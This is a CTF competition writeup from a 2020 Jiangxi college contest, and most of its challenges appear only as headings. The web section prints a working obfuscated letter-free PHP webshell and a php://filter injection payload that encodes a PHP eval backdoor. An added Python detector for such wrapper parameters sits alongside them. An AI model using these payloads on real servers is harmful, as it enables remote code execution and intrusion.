2020 Jiangxi Province College Student Information Security Technology Competition Writeup

Posted by black_doufu on 2020-10-27

I. WEB

0x01 web1 - Spot the Color Difference

Solution 1 - Official

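Solution 2 - Jiangxi University of Software Professional Technology

Intercept the request with Burp Suite and modify the submitted parameter directly; the response contains the flag.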

0x02 web2

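The organizers' configuration for this challenge seems to have been faulty: a single container hosted multiple vulnerable environments, so getting a shell was easy, but the flag could not be found. The organizers eventually replaced the challenge.

Solution 1 - None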

0x03 web3-Easy_console

Solution 1 - Official

Solution 2 - Jiangxi University of Software Professional Technology

I tried quite a few approaches on this one.

Writing a shell via the slow query log: failed

Getshell by writing to the log: failed

Finally, got a shell by uploading through the file upload function

Getshell with a letter-free one-line webshell

<?php $__=[]; $_=($__==$__); $__=~(融); $___=$__[$_]; $__=~(匆); $___.=$__[$_].$__[$_]; $__=~(隨); $___.=$__[$_]; $__=~(千); $___.=$__[$_]; $__=~(苦); $___.=$__[$_]; $____=~(~(_)); $__=~(詩); $____.=$__[$_]; $__=~(塵); $____.=$__[$_]; $__=~(欣); $____.=$__[$_]; $__=~(站); $____.=$__[$_]; $_=$$____; $___($_[_]);

0x04 web4-Ezexit

Solution 1 - Official

Solution 2 - Jiangxi University of Software Professional Technology

https://xz.aliyun.com/t/7457

path=php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../h.php
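
The `path` value above is a `php://filter` URL carrying a chain of conversion filters, so a request-log check can flag any parameter that decodes to a PHP stream wrapper. The following is an added detection example, not part of the original writeup or the competition code; the function names and the sample request targets are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Stream-wrapper schemes that have no business in a file-path parameter.
WRAPPER_RE = re.compile(r"^(php|data|phar|zip|expect|glob)://", re.I)
# Filter names as they appear between "php://filter/" and "resource=".
FILTER_RE = re.compile(r"(?:convert|string|zlib|bzip2)\.[a-z0-9_.*-]+", re.I)

def fully_decode(value, max_rounds=3):
    """Undo layered URL-encoding such as %2570 -> %70 -> p."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target):
    """Return one finding per parameter whose value is a stream-wrapper URL."""
    findings = []
    query = target.partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value).strip()
        match = WRAPPER_RE.match(value)
        if not match:
            continue
        filters = []
        if value.lower().startswith("php://filter/"):
            # Everything before "resource=" is the filter chain.
            spec = value[len("php://filter/"):].split("resource=", 1)[0]
            filters = [f.lower() for f in FILTER_RE.findall(spec)]
        findings.append({
            "param": name,
            "wrapper": match.group(1).lower(),
            "filters": filters,
            "traversal": "../" in value,
        })
    return findings

# Constructed sample request targets (hypothetical, payload body replaced).
SAMPLE_REQUESTS = [
    "/view.php?page=about&lang=en",
    "/save.php?path=php://filter/convert.iconv.utf-8.utf-7"
    "|convert.base64-decode/resource=PLACEHOLDER/../out.php",
    "/save.php?path=php%253A%252F%252Ffilter%252Fconvert.base64-decode"
    "%252Fresource%253Dout.php",
    "/save.php?path=notes/today.txt",
]

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        for finding in inspect_request(target):
            print(target[:40], finding)
```

On the application side the same idea becomes an allowlist: accept only plain relative file names for such a parameter and reject any value containing `://` or `../`.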

II. MISC

Different_P

Strange Misc

Mysterious File

newbie_rsa

III. REVERSE

ReMe

findme

IV. PWN

easy_rop

Summeron

V. CRYPTO

babyCrypto

Hong Kong Independence Secret Message
